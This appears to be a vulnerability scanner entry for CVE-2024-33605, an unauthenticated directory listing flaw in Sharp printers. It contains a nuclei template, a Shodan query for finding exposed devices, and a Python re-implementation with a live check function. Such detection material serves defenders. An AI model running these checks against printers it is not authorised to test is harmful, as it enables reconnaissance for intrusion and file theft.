Vulnerability description
Sharp multifunction printers were observed to be vulnerable to arbitrary directory listing without authentication: an unauthenticated attacker can list any directory on the printer's filesystem and retrieve any file from it. The nuclei template below does not itself walk the filesystem; it sends a single unauthenticated GET to /installed_emanual_list.html and reports a match when the device serves the e-manual listing page (the ServiceEmanualList marker and the /installed_emanual_down.html download link) with a 200 status and an MFPSESSIONID session cookie. A match therefore shows the listing endpoint is reachable pre-auth on that device; it is not proof that a specific file was recovered.
id: CVE-2024-33605

info:
  name: Sharp Multifunction Printers - Directory Listing
  author: gy741
  severity: high
  description: |
    It was observed that Sharp printers are vulnerable to an arbitrary directory listing without authentication. Any attacker can list any directory located in the printer and recover any file.
  impact: |
    Unauthenticated attackers can list arbitrary directories and recover files from Sharp multifunction printers.
  remediation: |
    Apply all relevant security patches and product upgrades for Sharp multifunction printers.
  reference:
    - https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html#pre-auth-arbitrary-directory-listing
    - https://jvn.jp/en/vu/JVNVU93051062/index.html
    - https://global.sharp/products/copier/info/info_security_2024-05.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-33605
    cwe-id: CWE-22
    epss-score: 0.51432
    epss-percentile: 0.97794
    cpe: cpe:2.3:o:sharp:mx-3550v_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: "Set-Cookie: MFPSESSIONID="
    product: mx-3550v_firmware
    vendor: sharp
  tags: cve,cve2024,sharp,printer,traversal,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/installed_emanual_list.html"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'ServiceEmanualList'
          - '/installed_emanual_down.html'
        condition: and

      - type: word
        part: header
        words:
          - "Set-Cookie: MFPSESSIONID="

      - type: status
        status:
          - 200
# digest: 4a0a004730450220008a18408b217262841ccaeb78737f7b9b36748a2c60c1b1f6c8650433941361022100bbeb5d80917045ebc52bb4968003ca66c048a447370a48303812db1c92b8aba0:922c64590222798bb761d5b6d8e72950
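The following is an added example, not code from the nuclei project or from the original advisory: a stand-alone Python re-implementation of the template's three matchers (body words with condition "and", the Set-Cookie header marker, and status 200, combined with matchers-condition "and"), so the match logic can be checked against a saved or captured HTTP response without running nuclei. The two raw responses embedded below are constructed for illustration and are not real printer output; the helper names (parse_raw_response, matches_template, check_target) are this example's own. check_target performs a live request and is only for use against devices you are authorised to test.

```python
"""Re-implementation of the CVE-2024-33605 nuclei template matchers.

Added example (not part of nuclei or the advisory). The sample responses are
constructed; the helper names are this example's own.
"""
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class HttpResponse:
    status: int
    headers: Dict[str, List[str]]  # lower-cased header name -> all values
    body: str


def parse_raw_response(raw: bytes) -> HttpResponse:
    """Parse a raw HTTP/1.x response: status line, headers, blank line, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])          # "HTTP/1.1 200 OK" -> 200
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return HttpResponse(status, headers, body.decode("utf-8", "replace"))


# Matcher values copied from the template above.
BODY_WORDS = ("ServiceEmanualList", "/installed_emanual_down.html")
COOKIE_MARKER = "MFPSESSIONID="


def matches_template(resp: HttpResponse) -> bool:
    """matchers-condition: and -- every matcher must pass."""
    body_ok = all(w in resp.body for w in BODY_WORDS)   # words, condition: and
    # nuclei matches 'Set-Cookie: MFPSESSIONID=' against the raw header block;
    # checking each Set-Cookie value for the marker is equivalent.
    header_ok = any(COOKIE_MARKER in v for v in resp.headers.get("set-cookie", []))
    status_ok = resp.status == 200
    return body_ok and header_ok and status_ok


def check_target(base_url: str, timeout: float = 10.0) -> bool:
    """Live check: GET {{BaseURL}}/installed_emanual_list.html and run the matchers."""
    import urllib.error
    import urllib.request
    url = base_url.rstrip("/") + "/installed_emanual_list.html"
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as r:
            status, hdrs, body = r.status, r.headers, r.read()
    except urllib.error.HTTPError as e:            # non-2xx still carries headers/body
        status, hdrs, body = e.code, e.headers, e.read()
    headers: Dict[str, List[str]] = {}
    for name, value in hdrs.items():               # items() keeps duplicate Set-Cookie
        headers.setdefault(name.lower(), []).append(value)
    return matches_template(HttpResponse(status, headers, body.decode("utf-8", "replace")))


# Constructed sample: unauthenticated listing page served with a session cookie.
VULNERABLE_SAMPLE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Set-Cookie: MFPSESSIONID=0123456789abcdef; path=/\r\n"
    b"\r\n"
    b"<html><body><div id=\"ServiceEmanualList\">"
    b"<a href=\"/installed_emanual_down.html\">manual</a></div></body></html>"
)

# Constructed sample: same cookie, but the device redirects to a login page.
NONMATCHING_SAMPLE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: /login.html\r\n"
    b"Set-Cookie: MFPSESSIONID=0123456789abcdef; path=/\r\n"
    b"\r\n"
)


def run_samples() -> Dict[str, bool]:
    """Evaluate the matchers over both constructed samples."""
    return {
        "vulnerable": matches_template(parse_raw_response(VULNERABLE_SAMPLE)),
        "nonmatching": matches_template(parse_raw_response(NONMATCHING_SAMPLE)),
    }


if __name__ == "__main__":
    print(run_samples())
```

Because the evaluation is an "and" over all three matchers, a device that sets the MFPSESSIONID cookie on every response (the Shodan query in the template selects on exactly that) does not match unless the listing page body and a 200 status are also present, which keeps the check from flagging every Sharp MFP that merely exposes a web UI.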